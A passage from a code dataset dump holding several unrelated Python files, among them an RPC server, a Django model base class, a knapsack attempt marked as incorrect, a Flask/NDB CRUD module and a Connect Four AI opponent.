[{item['project']}]\"\n\t\t\t\t\t\n\n\t\t\t\trespf(f\"#{item['id']}{project} - {item['description']}\")\t\n\nclass AddTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['add task', 'note']\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.add(message)\n\t\tself.manager.say(resp)\n\t\t\nclass DoneTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['complete task', 'finish task']\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\t_id = t.done(message)\n\t\tself.manager.say(f\"Task saved at ID {_id}.\")\t\n\t\t\nclass DeleteTask(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['remove task', 'delete task']\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.delete(message)\n\t\tself.manager.say(resp)\t\t\n","sub_path":"commands/taskw.py","file_name":"taskw.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"328480809","text":"#!/usr/bin/env python3\n\"\"\"提供进程间RPC通信的服务端\"\"\"\nimport pywind.evtframework.handler.tcp_handler as tcp_handler\nimport pywind.p_rpc.lib.rpc_func as rpc_func\nimport pywind.p_rpc.lib.proto as rpc_proto\nimport pywind.p_rpc.lib.jsonrpc as jsonrpc\n\nimport socket, json\n\n\nclass rpcd(tcp_handler.tcp_handler):\n __rpc_func = None\n __caddr = None\n __register_functions = None\n\n __proto_builder = None\n __proto_parser = None\n\n __js_builder = None\n __js_parser = None\n\n @property\n def caddr(self):\n return self.__caddr\n\n def __register_func(self, functions):\n if not self.__rpc_func: self.__rpc_func = rpc_func.func_call()\n for module in functions:\n for name, func in functions[module]: self.__rpc_func.register_function(name, func, module)\n return\n\n def init_func(self, creator_fd, register_functions, address=None, sock=None, caddr=None):\n if sock:\n self.set_socket(sock)\n\n self.__register_func(register_functions)\n self.__caddr = caddr\n\n self.__proto_builder = rpc_proto.builder()\n self.__proto_parser = rpc_proto.parser()\n\n self.__js_builder = jsonrpc.jsonrpc_builder(0)\n self.__js_parser = jsonrpc.jsonrpc_parser(0)\n\n self.register(self.fileno)\n self.add_evt_read(self.fileno)\n\n return self.fileno\n\n if isinstance(address, tuple):\n s = socket.socket()\n else:\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n self.__register_functions = register_functions\n self.set_socket(s)\n self.bind(address)\n\n return self.fileno\n\n def after(self):\n self.listen(10)\n self.register(self.fileno)\n self.add_evt_read(self.fileno)\n\n def tcp_accept(self):\n while 1:\n try:\n cs, caddr = self.accept()\n self.create_handler(self.fileno, rpcd, self.__register_functions, sock=cs, caddr=caddr)\n except BlockingIOError:\n break\n return\n\n def __handle_rpc(self, rpc_data):\n try:\n pydict = self.__js_parser.parse(rpc_data)\n except jsonrpc.jsonrpcErr:\n self.delete_handler(self.fileno)\n return\n method = pydict[\"method\"]\n ok = True\n\n try:\n result = self.__rpc_func.call_func(method, pydict[\"params\"])\n except rpc_func.RPCNotFoundMethodErr:\n pydict = self.__js_builder.build_return_error(\n jsonrpc.E_NOT_FOUND_METHOD, \"cannot found method %s\" % method)\n ok = False\n except rpc_func.RPCInvalidParamsErr:\n pydict = self.__js_builder.build_return_error(\n jsonrpc.E_INVALID_PARAMS, \"invalid method params on function %s\" % method\n )\n ok = False\n\n if ok: pydict = self.__js_builder.build_return_ok(result)\n\n resp_data = self.__proto_builder.build_response(json.dumps(pydict))\n\n self.add_evt_write(self.fileno)\n self.writer.write(resp_data)\n\n def tcp_error(self):\n self.delete_handler(self.fileno)\n\n def tcp_timeout(self):\n pass\n\n def tcp_readable(self):\n # 只支持同步调用\n rdata = self.reader.read()\n self.__proto_parser.input(rdata)\n self.__proto_parser.parse()\n rs = self.__proto_parser.get_result()\n\n if rs == None:\n self.reader._putvalue(rdata)\n return\n self.__handle_rpc(rs)\n\n def tcp_writable(self):\n if self.writer.size() == 0: self.remove_evt_write(self.fileno)\n\n def tcp_delete(self):\n self.unregister(self.fileno)\n self.socket.close()\n","sub_path":"pywind/p_rpc/handler/p_rpcd.py","file_name":"p_rpcd.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386046366","text":"from django.db import models\nfrom datetime import datetime\n\n\nclass Root(models.Model):\n entry_date = models.DateTimeField(auto_now=True)\n\n @property\n def json(self):\n data = {}\n for key, value in self.__dict__.items():\n data[key] = str(value)\n return data\n\n def as_option(self, value, text, selected=''):\n return ''.format(getattr(self, value), selected, getattr(self, text))\n\n def as_option_by_two_text(self, value, text1, text2, selected=''):\n return ''.format(getattr(self,value), selected, getattr(self,text1), getattr(self, text2))\n\n class Meta:\n abstract = True\n\n validator = {}\n\n @classmethod\n def validate(cls, **kwargs):\n for key, value in kwargs.items():\n field = cls.validator.get(key, None)\n if field:\n rule = field.get('type', 'default')\n if not cls.validator_rule.get(rule, cls.validator_default)(value, **cls.validator[key]):\n return False\n\n @classmethod\n def validator_string(cls, v, **kwargs):\n print(v)\n [print(key + ':' + str(value)) for key, value in kwargs.items()]\n\n @classmethod\n def validator_email(cls, v, **kwargs):\n pass\n\n @classmethod\n def validator_reg(cls, v, **kwargs):\n return True\n\n @classmethod\n def validator_default(cls, v, **kwargs):\n return True\n\n validator_rule = {\n 'string': validator_string,\n 'email': validator_email,\n 'reg': validator_reg,\n 'default': validator_default\n }\n","sub_path":"secu/models/Root.py","file_name":"Root.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298562854","text":"# 1. 무게1, 가치3 인 짐을 계속해서 담을 수 없기 때문에 안된다.\r\n# 2. 역시 짐의 무게를 더해가는데 무게4짜리를 더한거에 한번 더 더하는 계산이 발생한다.\r\n\r\nfrom typing import List\r\n\r\nclass Solution:\r\n def __init__(self, dp: List[int]):\r\n self.dp = dp\r\n\r\n def backPack(self, N: int, K: int):\r\n load = []\r\n for _ in range(N):\r\n W, V = map(int, input().split())\r\n load.append((W, V))\r\n\r\n load.sort(key = lambda x: (x[0], x[1]))\r\n\r\n for weight, value in load:\r\n \r\n for i in range(1, K + 1):\r\n if i + weight >= K + 1:\r\n break\r\n \r\n if i == weight:\r\n self.dp[i] = max(value, self.dp[i])\r\n continue\r\n\r\n if self.dp[i] == -1:\r\n continue\r\n\r\n if self.dp[i] != -1:\r\n self.dp[i + weight] = max(self.dp[i] + value, self.dp[i + weight])\r\n \r\n\r\n print(self.dp)\r\n return max(self.dp)\r\n\r\n\r\n\r\n\r\nN, K = map(int, input().split())\r\n\r\ndp = [0] + [-1 for _ in range(K)]\r\n\r\nsol = Solution(dp)\r\n\r\nprint(sol.backPack(N, K))","sub_path":"geonhokim/4.Dynamic_Programming/평범한배낭_오답.py","file_name":"평범한배낭_오답.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"244917502","text":"########################################################################################################################\n\n__doc__ = \\\n \"\"\"\nKeep a copy of the mol.\n \"\"\"\n\n########################################################################################################################\n\nfrom rdkit import Chem\nfrom ._base import _MonsterBase\nfrom typing import List\n\nclass _MonsterTracker(_MonsterBase):\n \"\"\"\n _MonsterBase -> _MonsterTracker -> _MonsterCommunal\n \"\"\"\n\n def keep_copy(self, mol: Chem.Mol, label=None):\n copy = Chem.Mol(mol)\n if label is None:\n label = f'Mol#{len(self.modifications)}'\n copy.SetProp('_Name', label)\n if label not in self.modifications:\n self.modifications[label] = copy\n else:\n label += '_'\n self.keep_copy(mol, label)\n\n\n def keep_copies(self, mols: List[Chem.Mol], label=None):\n for i, mol in enumerate(mols):\n copy = Chem.Mol(mol)\n if label is None:\n this_label = f'Mol#{len(self.modifications)}'\n else:\n this_label = f'{label}#{i}'\n self.keep_copy(mol, this_label)\n","sub_path":"fragmenstein/monster/_modification_logging.py","file_name":"_modification_logging.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477484296","text":"import logging\n\nfrom google.appengine.ext import ndb\nfrom flask_restplus import abort\n\nfrom src.beans.item import Item\nimport uuid\n\ndef create(args):\n\n if(not args.get('id', False)):\n args['id'] = str(uuid.uuid4())\n\n item = Item(\n **args\n )\n\n item.key = ndb.Key(Item, args['id'])\n \n item.put()\n\n return item\n\ndef update(id, args):\n\n get(id)\n args['id'] = id\n return create(args)\n\n\ndef get(id):\n\n item = ndb.Key(Item, id).get()\n if(item is None):\n abort(404, 'Item not found')\n\n return item\n\ndef list(offset, page_size):\n\n items = Item.query().order(Item.title).fetch(page_size, offset=offset)\n\n return items\n\ndef delete(id):\n\n item_key = ndb.Key(Item, id)\n item = item_key.get()\n\n if(item is None):\n abort(404, 'Item not found')\n\n item_key.delete()\n\n return None","sub_path":"src/biz/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192398970","text":"import random\nimport copy\n\nclass AIEasy(object):\n\t# Will block any 3 in a rows, or complete any self 3 in a rows\n\n\tcurr_choice = -1\n\tsetup_moves = [] # These will give the AI 3 in a row\n\tblock_moves = [] # These will BLOCK opponent from getting a 3 in a row\n\tsetup_and_block_moves = [] # These will setup AI and block opponent from getting 3inarow\n\tmoves_to_not_do = [] # These will make the opponent win\n\t\n\tneutral_options = [] # These have no major outcome on the game\n\tmedium_options = [] # These are setup and block (but not both)\n\n\tall_moves = [] # just 0 - 6\n\n\tdef __init__(self):\n\n\t\tself.curr_choice = -1\n\t\tself.good_options = []\n\t\tself.moves_to_not_do = []\n\t\tself.neutral_options = []\n\t\tself.all_moves = [0, 1, 2, 3, 4, 5, 6]\n\n\n\n\tdef make_move(self, game_board):\n\n\t\t# Find AI's 3 in a row. If it can win, do it.\n\t\t# Find opponent 3 in a row. If it can block, do it.\n\t\t# Avoid moves that will set up opponent for a guarenteed win\n\t\t# If none of these are options, make a random move\n\n\t\tmoves = None\n\n\t\t# 0 - Specific moves for the first turn\n\t\tif (game_board.filled_cells < 2):\n\t\t\t# On the first 2 turns, do only play in middle colums 3 through 5\n\t\t\trand_choice = random.randint(2, 4)\n\t\t\twhile (rand_choice != -1 and game_board.Cells[5][rand_choice].filled == True):\n\t\t\t\trand_choice = random.randint(2, 4)\n\t\t\tself.curr_choice = rand_choice\n\n\n\n\t\telif (game_board.filled_cells >= 2):\n\t\t\t\n\t\t\t# 1 - Look to complete AI's 3 in a row\n\t\t\tself.find_own_threeinrow(game_board)\n\n\t\t\t\n\t\t\t# 2 - Look to block your 3 in a row\n\t\t\tif (self.curr_choice == -1):\n\t\t\t\tself.find_your_threeinrow(game_board)\n\n\n\t\t\t# 3 - Randomize moves, avoiding setups\n\t\t\tif (self.curr_choice == -1):\n\n\t\t\t\tself.look_one_move_ahead(game_board)\n\n\t\t\t\t# Create the \"medium options\" list\n\t\t\t\tfor setup in self.setup_moves:\n\t\t\t\t\tif (setup not in self.medium_options):\n\t\t\t\t\t\tself.medium_options.append(setup)\n\t\t\t\tfor block in self.block_moves:\n\t\t\t\t\tif (block not in self.medium_options):\n\t\t\t\t\t\tself.medium_options.append(block)\n\n\t\t\t\t# Create the \"neutral options\" list\n\t\t\t\tfor i in range(0, 7):\n\t\t\t\t\tself.neutral_options.append(i)\n\n\n\t\t\t\t# Create the setup AND block options list\n\t\t\t\tfor i in range(0, 7):\n\t\t\t\t\tif (i in self.setup_moves and i in self.block_moves and i not in self.setup_and_block_moves):\n\t\t\t\t\t\tself.setup_and_block_moves.append(i)\n\n\n\n\t\t\t\t# Remove bad options from ALL the lists\n\t\t\t\tfor bad in self.moves_to_not_do:\n\t\t\t\t\tif bad in self.neutral_options:\n\t\t\t\t\t\tself.neutral_options.remove(bad)\n\t\t\t\t\tif bad in self.medium_options:\n\t\t\t\t\t\tself.medium_options.remove(bad)\n\t\t\t\t\tif bad in self.setup_and_block_moves:\n\t\t\t\t\t\tself.setup_and_block_moves.remove(bad)\n\n\n\n\t\t\t\t# # Print all my potential options\n\t\t\t\t# print(\"\\nNeutral options:\")\n\t\t\t\t# for neut in self.neutral_options:\n\t\t\t\t# \tprint(neut)\n\n\t\t\t\t# print(\"\\nBad options:\")\n\t\t\t\t# for bad in self.moves_to_not_do:\n\t\t\t\t# \tprint(bad)\n\n\t\t\t\t# print(\"\\nSetup options:\")\n\t\t\t\t# for setup in self.setup_moves:\n\t\t\t\t# \tprint(setup)\n\n\t\t\t\t# print(\"\\nBlock options:\")\n\t\t\t\t# for block in self.block_moves:\n\t\t\t\t# \tprint(block)\n\n\t\t\t\t# print(\"\\nSetup and block options:\")\n\t\t\t\t# for snb in self.setup_and_block_moves:\n\t\t\t\t# \tprint(snb)\n\n\n\t\t\t\tif (len(self.setup_and_block_moves) > 0):\n\t\t\t\t\tmoves = self.setup_and_block_moves\n\t\t\t\telif (len(self.medium_options) > 0 ):\n\t\t\t\t\tmoves = self.medium_options\n\t\t\t\telif (len(self.neutral_options) > 0):\n\t\t\t\t\tmoves = self.neutral_options\n\t\t\t\telse:\n\t\t\t\t\tmoves = self.all_moves\n\n\t\t\t\t\n\t\t\t\trand = random.randint(0, len(moves)-1)\n\t\t\t\trand_choice = moves[rand]\n\t\t\t\twhile (game_board.Cells[0][rand_choice].filled == True):\n\t\t\t\t\tif (len(moves) == 0):\n\t\t\t\t\t\tmoves = self.all_moves\n\t\t\t\t\trand = random.randint(0, len(moves)-1)\n\t\t\t\t\trand_choice = moves[rand]\n\t\t\t\t\tmoves.remove(rand_choice)\n\n\t\t\t\tself.curr_choice = rand_choice\n\n\n\n\t\tgame_board.make_move(self.curr_choice, 2, \"red\", 'x')\n\t\tself.curr_choice = -1\n\n\t\t# Reset all the potentital moves the AI had\n\t\tdel self.neutral_options[:]\n\t\tself.neutral_options = []\n\t\tdel self.medium_options[:]\n\t\tself.medium_options = []\n\t\tdel self.moves_to_not_do[:]\n\t\tself.moves_to_not_do = []\n\t\tdel self.setup_moves[:]\n\t\tself.setup_moves = []\n\t\tdel self.block_moves[:]\n\t\tself.block_moves = []\n\t\tdel self.setup_and_block_moves[:]\n\t\tself.setup_and_block_moves = []\n\n\n\n\t# Combine these 2 methods into 1\n\tdef find_own_threeinrow(self, game_board):\n\n\t\tdef check_vertical():\n\t\t\tfor c in range(0, game_board.num_cols):\n\t\t\t\tself.count_cells_in_block_vertical(game_board, 2, c)\n\n\t\tdef check_horizontal():\n\t\t\tfor r in range(0, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\t# Look at 4 cells at a time.\n\t\t\t\t\tself.count_cells_in_block_horizontal(game_board, 2, r, c, c+3)\n\t\t\t\t\t\n\t\tdef check_diagonal_up():\n\t\t\tfor r in range(3, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_up(game_board, 2, r, r-3, c, c+3)\n\n\t\tdef check_diagonal_down():\n\t\t\tfor r in range(0, game_board.num_rows-3):\n\t\t\t\tfor c in range(game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_down(game_board, 2, r, r+3, c, c+3)\n\n\n\t\tcheck_vertical()\n\t\tcheck_horizontal()\n\t\tcheck_diagonal_up()\n\t\tcheck_diagonal_down()\n\n\n\t\t\n\tdef find_your_threeinrow(self, game_board):\n\n\t\tdef check_vertical():\n\t\t\tfor c in range(0, game_board.num_cols):\n\t\t\t\tself.count_cells_in_block_vertical(game_board, 1, c)\n\n\t\tdef check_horizontal():\n\t\t\tfor r in range(0, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\t# Look at 4 cells at a time.\n\t\t\t\t\tself.count_cells_in_block_horizontal(game_board, 1, r, c, c+3)\n\n\t\tdef check_diagonal_up():\n\t\t\tfor r in range(3, game_board.num_rows):\n\t\t\t\tfor c in range(0, game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_up(game_board, 1, r, r-3, c, c+3)\n\n\t\tdef check_diagonal_down():\n\t\t\tfor r in range(0, game_board.num_rows-3):\n\t\t\t\tfor c in range(game_board.num_cols-3):\n\t\t\t\t\tself.count_cells_in_block_diag_down(game_board, 1, r, r+3, c, c+3)\n\t\t\t\t\t\n\t\tcheck_vertical()\n\t\tcheck_horizontal()\n\t\tcheck_diagonal_up()\n\t\tcheck_diagonal_down()\n\n\n\n\n\tdef count_cells_in_block_vertical(self, game_board, player_num, c):\n\n\t\tstop_counting = False\n\t\tlike_cells = 0\n\t\tcurr_r = 0\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\n\n\n\t\twhile (stop_counting == False and curr_r < game_board.num_rows):\n\n\t\t\t# Check if the column is full\n\t\t\tif (game_board.Cells[0][c].filled == True):\n\t\t\t\tstop_counting = True\n\n\t\t\tif (game_board.Cells[curr_r][c].player_num == player_num):\n\t\t\t\t# Your cell. Add like cell\n\t\t\t\tlike_cells += 1\n\t\t\t\tif (like_cells == 3):\n\t\t\t\t\tstop_counting = True\n\t\t\t\t\tself.curr_choice = c\n\t\t\t\t\t\n\t\t\tif (game_board.Cells[curr_r][c].player_num == opponent_num):\n\t\t\t\tstop_counting = True\n\t\t\tcurr_r += 1\n\n\n\n\n\tdef count_cells_in_block_diag_up(self, game_board, player_num, r_start, r_end, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\t\t\n\n\n\t\tc_curr = c_start\n\t\tr_curr = r_start\n\t\tfor r in range(r_end, r_start+1):\n\n\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\t\t\tc_curr+= 1\n\t\t\tr_curr+= -1\n\n\n\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tc = c_start\n\t\t\trt = r_start\n\t\t\tfor x in range(0, 4):\n\t\t\n\t\t\t\tif (game_board.Cells[rt][c].filled == False):\n\n\t\t\t\t\tif (rt < game_board.num_rows-1):\n\t\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\t\tif (game_board.Cells[rt+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\t\telif(rt == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\tc+=1\n\t\t\t\trt+=-1\n\n\n\n\tdef count_cells_in_block_diag_down(self, game_board, player_num, r_start, r_end, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\t\t\n\n\n\t\tc_curr = c_start\n\t\tr_curr = r_start\n\t\tfor r in range(r_start, r_end+1):\n\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r_curr][c_curr].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\t\t\tc_curr+= 1\n\t\t\tr_curr+= 1\n\n\n\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tc = c_start\n\t\t\trt = r_start\n\t\t\tfor x in range(0, 4):\n\n\t\t\t\tif (game_board.Cells[rt][c].filled == False):\n\t\t\t\t\tif (rt < game_board.num_rows-1):\n\t\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\t\tif (game_board.Cells[rt+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\t\telif(rt == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\t\tc+=1\n\t\t\t\trt+=1\n\n\n\n\tdef count_cells_in_block_horizontal(self, game_board, player_num, r, c_start, c_end):\n\n\t\tlike_cells = 0\n\t\tchoice = -1\n\t\topponent_num = 0\n\t\tif (player_num == 1):\n\t\t\topponent_num = 2\n\t\telse:\n\t\t\topponent_num = 1\n\n\t\tfor c in range(c_start, c_end+1):\n\t\t\tif (game_board.Cells[r][c].player_num == player_num):\n\t\t\t\tlike_cells += 1\n\t\t\tif (game_board.Cells[r][c].player_num == opponent_num):\n\t\t\t\t# Not like, but its already filled\n\t\t\t\tlike_cells += -1\n\n\t\t\n\t\tif (like_cells == 3):\n\t\t\t# There were 3 like cells here. AI wants to go here. Find odd one out?\n\n\t\t\tchoice = -1\n\t\t\tfor c in range(c_start, c_end+1):\n\t\t\t\tif (game_board.Cells[r][c].filled == False):\n\t\t\t\t\t# This is the empty space it wants to fill\n\t\t\t\t\tif (r < game_board.num_rows-1):\n\t\t\t\t\t\tif (game_board.Cells[r+1][c].filled == True):\n\t\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\t\tself.curr_choice = choice\n\n\t\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\n\t\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\n\t\t\t\t\telif (r == game_board.num_rows-1):\n\t\t\t\t\t\tchoice = c\n\t\t\t\t\t\tself.curr_choice = choice\n\t\t\t\t\t\tif (game_board.future == True and player_num == 1):\n\t\t\t\t\t\t\tif c not in self.moves_to_not_do:\t\n\t\t\t\t\t\t\t\tself.moves_to_not_do.append(c)\n\t\t\n\n\n\tdef look_one_move_ahead(self, game_board):\n\n\t\t# If the AI places something in this column, will this set up a 4 in a row for the oppponent?\n\t\t# If it does, then DONT do this move\n\n\t\tfor c in range(0, game_board.num_cols):\n\t\t\tfuture_board = copy.deepcopy(game_board)\n\t\t\tfuture_board2 = copy.deepcopy(game_board)\n\t\t\tfuture_board.future = True\n\t\t\tfuture_board.make_move(c, 2, \"black\", '?')\n\t\t\tself.look_for_good_moves(future_board2, c)\n\t\t\tself.find_your_threeinrow(future_board)\n\t\t\t# I have a future board for each possible column, check for possible human victory\n\t\t\t# If it makes one, then dont do this column\n\n\n\n\tdef look_for_good_moves(self, future_board, col):\n\n\t\t# Here I have the current board. Analyze it for:\n\t\t# AI 2 in a row (that can be 4) - Middle Priority\n\t\t# opponent 2 in a row (that can be 4) - Low Priority\n\t\t# If it is both, then that move is really good - High Priority\n\n\n\t\tmaster_board = copy.deepcopy(future_board)\n\n\t\t# Look for AI's good moves\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_vertical(future_board, col, 2)\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_horizontal(future_board, col, 2)\n\t\t# self.check_if_good_move_diag_up(future_board, col, 2)\n\t\t# self.check_if_good_move_diag_down(future_board, col, 2)\n\n\t\t# Look for opponent's good moves\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_vertical(future_board, col, 1)\n\t\tfuture_board = copy.deepcopy(master_board)\n\t\tself.check_if_good_move_horizontal(future_board, col, 1)\n\t\t# self.check_if_good_move_diag_up(future_board, col, 1)\n\t\t# self.check_if_good_move_diag_down(future_board, col, 1)\n\n\n\tdef check_if_good_move_vertical(self, future_board, col, player_num):\n\n\t\t# Find the highest empty spot.\n\t\ttop_empty_row = -1\n\t\tfor r in range(0, future_board.num_rows):\n\t\t\tif (future_board.Cells[r][col].filled == False):\n\t\t\t\ttop_empty_row = r\n\n\t\tif (top_empty_row >= 1 and top_empty_row <= 3):\n\t\t\t# Only care if at least 2 in this col\n\t\t\tif (future_board.Cells[top_empty_row+1][col].player_num == player_num and future_board.Cells[top_empty_row+2][col].player_num == player_num):\n\t\t\t\tif (player_num == 2):\n\t\t\t\t\tself.setup_moves.append(col)\n\t\t\t\telif (player_num == 1):\n\t\t\t\t\tself.block_moves.append(col)\n\n\n\tdef check_if_good_move_horizontal(self, future_board, col, player_num):\n\n\t\t# Find the highest empty spot.\n\t\ttop_empty_row = -1\n\t\tfor r in range(0, future_board.num_rows):\n\t\t\tif (future_board.Cells[r][col].filled == False):\n\t\t\t\ttop_empty_row = r\n\n\t\tif (top_empty_row >= 0 and top_empty_row <= 6):\n\t\t\tfuture_board.Cells[top_empty_row][col].filled = True\n\t\t\tfuture_board.Cells[top_empty_row][col].player_num = player_num\n\n\n\t\t\n\t\tdef shadow_horizontal(game_board, player_num, r, col_check, c_start, c_end):\n\n\t\t\tlike_cells = 0\n\t\t\tchoice = -1\n\t\t\topponent_num = 0\n\t\t\tif (player_num == 1):\n\t\t\t\topponent_num = 2\n\t\t\telse:\n\t\t\t\topponent_num = 1\n\n\t\t\tfor c in range(c_start, c_end+1):\n\t\t\t\tif (game_board.Cells[r][c].player_num == player_num):\n\t\t\t\t\tlike_cells += 1\n\t\t\t\tif (game_board.Cells[r][c].player_num == opponent_num):\n\t\t\t\t\t# Not like, but its already filled\n\t\t\t\t\tlike_cells += -1\n\n\n\n\t\t\tif (like_cells == 3):\n\t\t\t\t# There were 3 like cells here. AI wants to go here. Find odd one out?\n\n\t\t\t\tif (r < game_board.num_rows-1):\n\t\t\t\t\t# Not bottom row\n\t\t\t\t\tif (game_board.Cells[r+1][c].filled == True):\n\t\t\t\t\t\tif (player_num == 1):\n\t\t\t\t\t\t\tif (col_check not in self.block_moves):\n\t\t\t\t\t\t\t\tself.block_moves.append(col_check)\n\t\t\t\t\t\telif (player_num == 2):\n\t\t\t\t\t\t\tif (col_check not in self.setup_moves):\n\t\t\t\t\t\t\t\tself.setup_moves.append(col_check)\n\n\n\n\t\t\t\telif (r == game_board.num_rows-1):\n\t\t\t\t\t# bottom row\n\t\t\t\t\tif (player_num == 1):\n\t\t\t\t\t\tif (col_check not in self.block_moves):\n\t\t\t\t\t\t\tself.block_moves.append(col_check)\n\t\t\t\t\telif (player_num == 2):\n\t\t\t\t\t\tif (col_check not in self.setup_moves):\n\t\t\t\t\t\t\tself.setup_moves.append(col_check)\n\n\n\t\t\n\t\tif (col == 0):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\telif (col == 1):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\telif (col == 2):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\telif (col == 3):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 0, 3)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\t\t\n\t\telif (col == 4):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 1, 4)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\t\telif (col == 5):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 2, 5)\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\t\telif (col == 6):\n\t\t\tshadow_horizontal(future_board, player_num, top_empty_row, col, 3, 6)\n\n\n\n","sub_path":"AIEasy.py","file_name":"AIEasy.py","file_ext":"py","file_size_in_byte":15779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"430506966","text":"import cv2\nimport numpy as np\nimport os\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\n\ndef confusionMat(correct_Labels, Predicted_Labels ,excel_file_name):\n label = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'zero', 'one', 'two', 'three', 'four', 'five', 'six', 